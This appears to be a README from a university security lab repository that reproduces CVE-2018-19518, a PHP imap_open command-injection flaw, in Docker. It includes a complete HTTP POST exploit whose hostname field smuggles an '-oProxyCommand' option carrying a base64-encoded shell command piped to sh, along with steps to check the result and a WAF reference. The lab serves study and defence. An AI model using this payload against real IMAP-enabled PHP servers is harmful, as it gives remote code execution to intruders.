CVE-2018-19518

last rapport here : https://gitlab.com/ensimag-security/CVE-2018-19518/-/jobs/artifacts/master/raw/rapport.pdf?job=PDF

Usage

run app

docker-compose up -d

example normal usage for the web app.

imap : webmail.grenoble-inp.org
user : prenom.nom@grenoble-inp.org
password : xxx

exploit

using echo '1234567890'>/tmp/test0001.

POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222

check

docker-compose exec app bash and read the file cat /tmp/test0001：

waf

https://github.com/theonemule/docker-waf

Relevant commit

https://git.php.net/?p=php-src.git;a=commit;h=e5bfea64c81ae34816479bb05d17cdffe45adddb

References

https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
https://nvd.nist.gov/vuln/detail/CVE-2018-19518
https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb

ensimag-security / CVE-2018-19518

CVE-2018-19518

Usage

run app

exploit

check

waf

Relevant commit

References

About

Languages